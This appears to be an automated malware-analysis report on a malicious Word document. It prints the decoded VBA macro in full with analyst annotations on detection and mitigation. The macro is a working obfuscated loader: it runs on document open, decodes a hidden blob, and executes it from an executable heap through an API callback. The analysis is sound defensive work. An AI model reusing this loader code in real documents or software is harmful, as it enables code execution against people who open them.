Verdict: MALICIOUS — Risk Score: 90
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with a critical heuristic firing for a dropper agent. The presence of VBA macros, specifically a Document_Open macro, indicates an attempt to automatically execute code upon opening. The VBA script itself appears to be obfuscated but contains elements suggesting it is designed to download and execute a second-stage payload, a common dropper behavior.
Heuristics (4)
-
ClamAV: Doc.Dropper.Agent-6421647-0 — severity: critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6421647-0
-
VBA macros detected — severity: medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — severity: low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script (with surrounding context): `End Function` / `Private Sub Document_Open()` / `Dim escapist As Byte`
Embedded URL — severity: info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note that every URL below was found in document text rather than in the macro; they have the form of XMP/RDF metadata namespace identifiers, not network destinations the macro contacts. URL: http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/ — In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
- http://purl.org/dc/elements/1.1/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
- http://www.iec.ch — In document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12566 bytes | 3c24f99b406cdfc02b109689c0032b12329b60b80c46fa60c9bf1f73552445a4 |
Preview script — first 1,000 lines of the extracted script (the VBA below is the decoded artifact whose SHA-256 is listed above; it is reproduced as evidence, not as code to run):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim fullhanded
Dim inspissate
Dim undernsong
Dim soupstrainer
' Analyst note: benign-looking filler. Activates every open document in turn.
' Nothing in this listing calls PrintForCall; it looks like decoy code placed
' to make the module resemble an ordinary automation macro.
Sub PrintForCall()
Dim aDoc As ThisDocument
For Each aDoc In Documents
aDoc.Activate
Next
End Sub
' Analyst note: copies the decoded payload into the buffer that podiatrist()
' obtained from HeapAlloc. "ingredient" is the Declare alias for
' ntdll!RtlMoveMemory (see the agglutination module).
'   sugarplum  - destination address (the HeapAlloc return value)
'   repellant  - Variant holding the byte array produced by anounce()
' The function never assigns its own name, so it has no meaningful return
' value; it is invoked as a statement purely for its side effect.
Function cimicidae(sugarplum, repellant)
Dim competitively As Variant
Dim handbarrow As Variant
' Padding: module global updated but never read afterwards.
inspissate = inspissate - 96
Dim frustrating As Integer
Dim sledder As Long
Dim corruption As Byte
Dim antimagnetic As String
Dim neckband As Long
' Reads 4 bytes at offset 8 of the VARIANT argument into sledder. Offset 8 is
' the VARIANT data union, so this is presumably meant to recover a pointer to
' the decoded array's storage — confirm the exact layout in a debugger rather
' than trusting the comment. Only 4 bytes are read even on 64-bit builds.
ingredient sledder, ByVal VarPtr(repellant) + 8, 4
undernsong = undernsong / 388
neckband = sugarplum
' Dead loop: every assignment here is to a local or to padding globals and
' has no observable effect.
For dulia = 15 To 66
bioclimatology = 66
fullhanded = soupstrainer
froelichia = "myo" & LCase$("glObin")
froelichia = LCase$("aP") & "hid"
Next dulia
' Copies 3299 bytes — the same size podiatrist() requested from HeapAlloc —
' from the recovered source pointer into the destination buffer.
ingredient ByVal neckband, ByVal sledder, 3299
soupstrainer = "costerman"
End Function
' Analyst note: the loader's orchestration routine, reached from Document_Open.
' Sequence visible in this listing:
'   1. read an encoded blob from a UserForm control's ControlTipText,
'   2. decode it with anounce() (a base64 decoder, see that function),
'   3. create a heap with HeapCreate and allocate 3299 bytes in it,
'   4. copy the decoded bytes into that allocation (cimicidae),
'   5. hand an address inside the allocation to EnumUILanguagesW as its
'      callback, so the API itself transfers control into the buffer.
' Detection: a VBA project that declares HeapCreate/HeapAlloc/RtlMoveMemory
' together with an enumeration API taking a callback, plus an auto-exec
' entry point, is a strong static indicator independent of the random names.
' The opaque predicates and throw-away loops below never change the outcome.
Sub podiatrist()
Dim fortuitous As Byte
Dim xanthomonad As Long
' The encoded payload lives in the tooltip text of control "byelaw" on the
' form module "producing" — a storage spot that keeps it out of the code text.
unrip = producing.byelaw.ControlTipText
' anounce() returns the decoded bytes (base64, with a small alphabet shift).
reversibility = agglutination.anounce(unrip)
' Padding loop; no effect.
For aleut = 22 To 73
extravagance = 73
fullhanded = fullhanded
adenovirus = LCase$("SC") & LCase$("Up")
adenovirus = UCase$("RE") & UCase$("FUsE")
Next aleut
penthesilean = "perisher"
bites = "priestess"
' Conditional compilation: on 64-bit Office "diener" is the user type
' "chaotically" (one LongPtr field, zeroed) and "somatism" is a LongPtr;
' on 32-bit both are plain Longs. This keeps the API calls below well-typed
' on either bitness.
#If Win64 Then
Dim patagonia As Variant
Dim diener As chaotically
Dim somatism As LongPtr
diener.header = 0
Dim pomade As Long
#Else
Dim oahu As String
diener = 0
Dim saimiri As Byte
Dim somatism As Long
#End If
haunt = 0
usherette = "bal"
alnashar = 4096
candleholder = 60
numerate = 75
' Opaque predicate: 60 + 75 < 0 is never true, so only the Else branch runs.
If candleholder + numerate < 0 Then
candleholder = Left("unprcapital", 4) & UCase$("oNOuNcE") & UCase$("AbLe")
fullhanded = fullhanded
deft = Right$("valorousab", 2) & Left("iesdilatation", 3)
Else
inspissate = inspissate * 4
numerate = 38
End If
' 79 - 13 + 94 + 261984 = 262144 = 0x40000, the HeapCreate option flag
' HEAP_CREATE_ENABLE_EXECUTE: the heap is created with executable pages.
pertinacious = 79 - 13 + 94 + 261984
' suffice = kernel32!HeapCreate(flOptions, dwInitialSize, dwMaximumSize);
' passing "diener" (zero) for both sizes yields a growable heap.
lathi = suffice(pertinacious, diener, diener)
' istic = kernel32!HeapAlloc(hHeap, 0, 3299) — the buffer the payload is
' copied into. 3299 is slightly larger than the 3216 bytes anounce() yields
' from its 4288-character input.
somatism = istic(lathi, 0, 3299)
pelican = Mid("blockburjungian", 6, 3) & "gomas" & "ter"
Dim correctable As String
horometry = "concessionaire"
pagan = Mid("apatiteancquo", 8, 3) & UCase$("hORag") & Right$("nudgee", 1)
' ravishing() returns the full path of this document; it is later passed as
' the lParam of the callback, presumably so the payload can locate the file.
correctable = ravishing
influx = 55
chrysolite = 54
' Opaque predicate: 55 + 54 < 36 is never true.
If influx + chrysolite < 36 Then
influx = Right$("attarcr", 2) & LCase$("IsTO") & Right$("bloodguiltybalite", 6)
soupstrainer = soupstrainer
impenitent = LCase$("Bl") & Left("indsamedeboue", 4)
Else
soupstrainer = "adynamic"
chrysolite = 2
End If
macrocosmic = reversibility
frost = "leontocebus"
' Copy the decoded bytes into the executable heap allocation.
cimicidae somatism, macrocosmic
sanctification = LCase$("CHE") & Left("eseboscience", 5) & LCase$("ARd")
' Entry offset into the buffer: 576 on 64-bit, 2204 on 32-bit
' (81 - 108 - 96 + 629 + 1698). Two bitness-specific stubs are presumably
' packed into the same blob.
#If Win64 Then
Dim catechize As String
conservancy = "compromise"
agglutinate = "ruddle"
exciseman = "cruse"
teachership = 105 + 471
#ElseIf (Win32) Then
teachership = 81 - 108 - 96 + 629 + 1698
#End If
Dim troupe As Long
Dim barry As Variant
Dim boise As Long
boise = 0
Dim flowmeter As Long
' flowmeter = allocation base + bitness-specific offset.
flowmeter = somatism + teachership
' siren = kernel32!EnumUILanguagesW(lpUILanguageEnumProc, dwFlags, lParam).
' The first argument is the address computed above, so the API calls into
' the heap buffer; lParam is the document path. This is the point at which
' the decoded bytes gain control.
plucky = siren(flowmeter, boise, correctable)
' Padding loop; no effect.
For et = 33 To 71
avouch = 71
inspissate = undernsong + 481
hazards = LCase$("fe") & Left("ndrecohabitation", 4)
hazards = Left("cadecession", 2) & Mid("struthionidaeffeinealligation", 14, 6)
Next et
End Sub
' Analyst note: returns the on-disk location of the open document as
' "<folder>/<filename>" (forward slash joined). podiatrist() passes the result
' as the callback's lParam. The loop is padding with no effect.
Function ravishing()
Dim boutonniere As String
Dim herborist As Variant
For charades = 17 To 51
unhelpfully = 51
soupstrainer = soupstrainer
morphologically = Right$("gomphotheriidaemu", 2) & UCase$("mBLi") & Left("ngsexlimited", 2)
morphologically = Right$("lombardba", 2) & Mid("bawlckwacult", 5, 4) & Left("terenrich", 3)
Next charades
contending = ThisDocument.Path
ravishing = contending & "/" & ThisDocument.Name
End Function
' Analyst note: auto-execution entry point (the OLE_VBA_DOCOPEN finding).
' Word runs this when the document opens and macros are enabled; the only
' meaningful statement is the call to podiatrist(). Everything else is
' string padding. Mitigation: blocking macros from internet-sourced files
' prevents this handler from firing.
Private Sub Document_Open()
Dim escapist As Byte
Dim polarimeter As Long
experimentist = LCase$("eq") & Mid("virginityuiprice", 10, 3)
mandrill = "gregorian"
' Hands off to the loader routine.
podiatrist
For kites = 12 To 51
groggy = 51
soupstrainer = soupstrainer
fatherinlaw = LCase$("pe") & Mid("israelilagicmonoculous", 8, 5)
fatherinlaw = LCase$("SU") & Mid("bedouincklingcoherence", 8, 6)
Next kites
End Sub
Attribute VB_Name = "agglutination"
' Analyst note: standard module holding the Win32 API imports. Every Declare
' uses a random VBA name with the real export in the Alias clause, so the API
' names survive static inspection even though the identifiers do not. The
' lyric-line comments are filler. Imports used by the loader: siren
' (EnumUILanguagesW), ingredient (RtlMoveMemory), istic (HeapAlloc), suffice
' (HeapCreate). The remaining imports (GetDC, RemoveDirectoryA, EndDialog,
' GetModuleHandle, TlsAlloc) are never referenced in this listing — decoys.
' Detection: match on the Alias strings, not on the declared names.
'The stress in life
'Life is gone
#If Win64 Then
'Let it all go and in time you will find
'Can't you see
' One-field user type; podiatrist() passes a zeroed instance to HeapCreate
' for both size arguments on 64-bit.
Public Type chaotically
'I can't escape
'I'm not okay
header As LongPtr
'Life is gone
'The pressure seems to get me down
End Type
'Life is gone
'I can't escape
' Used: enumeration API whose first parameter is a callback pointer.
Public Declare PtrSafe Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'The pressure seems to get me down
'Numb me 'til I won't feel pain again
' Unused in this listing.
Public Declare PtrSafe Function cacus Lib "user32" Alias "GetDC" (ByVal conversationalist As LongPtr) As LongPtr
'I can't deal with your lies
'Poisons me with time
' Unused in this listing.
Public Declare PtrSafe Function arariba Lib "kernel32" Alias "RemoveDirectoryA" (acanthocephala As LongPtr)
'I am no one
'The pressure seems to get me down
' Unused in this listing.
Public Declare PtrSafe Function brachiopod Lib "user32" Alias "EndDialog" (ByVal city As LongPtr,nResult As LongPtr) As LongPtr
'I wish I could watch you drown and die
'They have said
' Unused in this listing.
Public Declare PtrSafe Function subvert Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'I don't fit in
'I wish I could watch you drown and die
' Used: memory copy (reads the array pointer and copies the payload).
Public Declare PtrSafe Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (affronterai As Any, punchinello As Any, ByVal gurgel As LongPtr)
'I can't escape
'I am no one
' Unused in this listing.
Public Declare PtrSafe Function anomalousness Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'Poisons me with time
'I lost my mind
' Used: allocation inside the executable heap.
Public Declare PtrSafe Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal oropharynx As LongPtr, ByVal ameboid As LongPtr, ByVal fences As LongPtr) As LongPtr
'Can't you see
'Let it all go and in time you will find
' Used: heap creation (called with the 0x40000 executable option).
Public Declare PtrSafe Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal rattle As LongPtr,card As chaotically, magnetosphere As chaotically) As LongPtr
'I am no one
'Life has always been a problem
'And take my time
'Life is gone
#Else
' 32-bit equivalents of the imports above (Long instead of LongPtr). The
' decoy imports carry different random names here; the four used by the
' loader keep the same names (istic, siren, ingredient, suffice).
'It's like a needle in my spine
'I am no one
Public Declare Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal overcompensation As Long, ByVal backroom As Long, ByVal angelus As Long) As Long
'It stings inside
'Let it all go and in time you will find
Public Declare Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal atonement As Any, lParam As Any) As Long
'I don't fit in
'I don't fit in
Public Declare Function amenra Lib "kernel32" Alias "RemoveDirectoryA" (arminius As Long)
'And take my time
'I don't fit in
Public Declare Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (cooperate As Any, conscience As Any, ByVal jerrybuilder As Long)
'Let it all go and in time you will find
'Nothing is real and dies in the lies
Public Declare Function miscorrect Lib "user32" Alias "GetDC" (footprint As Long) As Long
'They have said
'I am no one
Public Declare Function quadrate Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'Life is gone
'Life is gone
Public Declare Function overwhelming Lib "user32" Alias "EndDialog" (ByVal eccentricity As Long, aviation As Long) As Long
'I wish I could watch you drown and die
'I don't fit in
Public Declare Function fuzzy Lib "kernel32" Alias "TlsAlloc" () As Long
'Life is gone
'Life is gone
Public Declare Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal scarecrow As Long, ByVal retention As Long, ByVal catamount As Long) As Long
'I'm not okay
'I don't fit in
'Life is gone
'And take my time
#End If
'I don't fit in
'And take my time
' Integer division wrapper (VBA "\"). anounce() uses it to shift a 24-bit
' value right by 16 or 8 bits via division by 65536 / 256.
Function sowbane(affrayment, counselorship)
sowbane = affrayment \ counselorship
End Function
' Bitwise AND wrapper. anounce() uses it to mask individual bytes out of a
' 24-bit value (0xFF0000, 0xFF00, 0xFF).
Function halenia(bolete, buxus)
halenia = bolete And buxus
End Function
' Analyst note: a standard base64 decoder whose constants are all assembled
' from arithmetic so that no recognisable literal appears in the source.
'   cockade - the encoded text (read from the form control's ControlTipText).
' Returns a Byte array (assigned to the String-typed function name; VBA
' converts it on return). Steps:
'   - copy the first 4288 characters into a byte array,
'   - add 2 to every byte (the stored alphabet is shifted by -2 relative to
'     the standard base64 alphabet — a one-byte substitution),
'   - build the usual A-Z/a-z/0-9/+// decode table,
'   - pack each 4-character group into 24 bits and emit 3 bytes.
' No '=' padding handling: unset table entries decode as 0.
' Everything not mentioned below is padding with no effect on the output.
Function anounce(cockade) As String
Dim charitably As Long
Dim sabreur(255) As Byte
Dim aural(63) As Long
Dim hymenophyllaceae As Long
Dim commutability(63) As Long
Dim supernumernry(63) As Long
inspissate = undernsong And 443
Dim grisette() As Byte
Dim camarade As Integer
Dim gasman As Integer
fullhanded = fullhanded
Dim unsuccessfully As Long
Dim hunkpapa As Long
Dim pigeonhole As Long
Dim ovate() As Byte
Dim orbiculate As String
Dim downstage As Long
' luckless = 4096 (2^12), weapons = 65280 (0xFF00).
luckless = 57 + 4039
weapons = 23 + 56 + 6 + 65195
Dim coxcomical As Long
' cricket = 64 (2^6), blowfish = 262144 (2^18).
cricket = 64
blowfish = 124 + 67 + 261953
buglehorn = 100 - 120 + 83
Dim rez As Byte
auld = 103 + 94 + 118 + 257733
michigander = 61 + 117 + 114 + 3740
' conspectuity = 255 (0xFF), backwoods = 256 (2^8).
conspectuity = 125 + 38 + 97 - 5
backwoods = 75 - 71 + 252
Dim pallone As Variant
' billboard = 0xFF0000, prosternation is unused, arginine = 65536 (2^16).
billboard = 16711680
prosternation = 16515072
arginine = 34 + 57 - 45 + 65490
Dim clavariaceae As Variant
Dim poker() As Byte
' Fixed-size input: exactly 4288 characters are consumed. A shorter string
' would make Mid$ return "" and Asc raise a runtime error, so the stored blob
' is presumably exactly this length.
ReDim poker(4287)
absorbate = 4288
For i = 1 To absorbate
meow = Mid$(cockade, i, 1)
maidenhead = (Asc(meow))
brood = Right$("countshi", 2) & Right$("cablestri", 4) & Right$("hugonem", 4)
poker(i - 1) = maidenhead
Next
Dim cleaners As Integer
scolion = 3
While scolion < 8
scolion = scolion + 1
undernsong = undernsong + 418
Wend
hierarchically = UBound(poker)
hopsacking = 35
' Alphabet shift: every input byte is incremented by 2 before table lookup.
For crackdown = 0 To hierarchically
poker(crackdown) = poker(crackdown) + 2
Next crackdown
For serene = 3 To 57
lombardy = 57
inspissate = inspissate \ 391
sapient = Mid("electriciandetinsanely", 12, 3) & UCase$("RimeNtAl")
sapient = Right$("balkinessjo", 2) & Mid("breechclothnahlycaena", 12, 3)
Next serene
gasman = 0
scholarship = 122
baal = 255
' Decode table: 'A'..'Z' -> 0..25, 'a'..'z' -> 26..51 (97 - 71 = 26),
' '0'..'9' -> 52..61 (+8 - 127 + 123 = +4), '+' -> 62, '/' -> 63.
For unsuccessfully = 0 To baal
Select Case unsuccessfully
Case 65 To 90
sabreur(unsuccessfully) = unsuccessfully - 65
Case 97 To scholarship
sabreur(unsuccessfully) = unsuccessfully - 71
Case 48 To 57
sabreur(unsuccessfully) = unsuccessfully + 8 - 127 + 123
Case 43
sabreur(unsuccessfully) = 62
Case 47
sabreur(unsuccessfully) = 63
End Select
Next unsuccessfully
' Shift tables (chasser = multiply): value << 6, << 12, << 18 for the
' third, second and first sextet of each group.
For unsuccessfully = 0 To 63
supernumernry(unsuccessfully) = chasser(unsuccessfully, cricket)
aural(unsuccessfully) = chasser(unsuccessfully, luckless)
commutability(unsuccessfully) = chasser(unsuccessfully, blowfish)
Next unsuccessfully
wishes = 12
While wishes < 15
wishes = wishes + 1
inspissate = inspissate \ 55
Wend
grisette = poker
' mongo = 4: output length is (input length / 4) * 3 bytes, i.e. 3216 here.
mongo = 12 - 54 - 76 + 122
ReDim ovate((((UBound(grisette) + 1) \ mongo) * 3) - 1)
For thistly = 41 To 51
sapling = 51
soupstrainer = "alchemic"
roadster = UCase$("De") & "mijo" & "ur"
roadster = "ap" & UCase$("hAKI") & UCase$("a")
Next thistly
' wronged = 3, begum = 4 (loop step), aepyorniformes = 2.
wronged = 56 - 42 + 7 - 18
fullhanded = soupstrainer
inspissate = undernsong / 132
begum = wronged + 1
aepyorniformes = 31 - 32 + 3
' Main decode loop: four sextets -> one 24-bit value -> three bytes.
For hymenophyllaceae = 0 To UBound(grisette) Step begum
coexistence = grisette(hymenophyllaceae)
pigeonhole = commutability(sabreur(coexistence)) _
+ aural(sabreur(grisette(hymenophyllaceae + 1))) + supernumernry(sabreur(grisette(hymenophyllaceae + 2))) + sabreur(grisette(hymenophyllaceae + wronged))
' byte 0 = (v And 0xFF0000) \ 65536
unsuccessfully = halenia(pigeonhole, billboard)
ovate(charitably) = sowbane(unsuccessfully, arginine)
' byte 1 = (v And 0xFF00) \ 256
unsuccessfully = halenia(pigeonhole, weapons)
ovate(charitably + 1) = sowbane(unsuccessfully, backwoods)
' byte 2 = v And 0xFF
ovate(charitably + aepyorniformes) = halenia(pigeonhole, conspectuity)
charitably = charitably + aepyorniformes + 1
Next hymenophyllaceae
anounce = ovate
End Function
' Multiplication wrapper. anounce() uses it with powers of two (64, 4096,
' 262144) to build the left-shift lookup tables.
Function chasser(courageous, acception)
chasser = courageous * acception
End Function
' Analyst note: decoy. Reads as a generic "re-attach template to every
' document in a folder" macro, but strCurDoc, strDocPath, strTemplateB and
' wdSaveChanges are never defined in this listing and nothing calls the
' routine. It appears to exist only to make the project look like ordinary
' office automation.
Sub TemplatesDoChange()
Dim CurDoc As Document
Do While strCurDoc <> ""
Set CurDoc = Documents.Open(FName:=strDocPath & strCurDoc)
CurDoc.AttachedTemplate = strTemplateB
CurDoc.Close wdSaveChanges
strCurDoc = Dir
Loop
End Sub
' Analyst note: attribute headers of two form-style modules (the VB_Base
' GUID pair is the layout the exporter writes for UserForms). "producing"
' is the form whose control "byelaw" carries the encoded payload in its
' ControlTipText (read by podiatrist). The control definitions themselves
' are stored in the form's binary stream, not in this decoded source.
Attribute VB_Name = "producing"
Attribute VB_Base = "0{D49F5CA7-F1C1-4117-A68E-D10E8F1924EC}{A7C12257-AF1F-469E-A10E-A5E77398E32D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' "whitish" is not referenced anywhere else in this listing; presumably a
' second form that is either empty or a decoy.
Attribute VB_Name = "whitish"
Attribute VB_Base = "0{DCB58BD7-81CC-4FEE-8775-9A9A830BD59C}{0A3CA1CA-8CEC-4FD5-B377-2ABB5C8EDFCD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False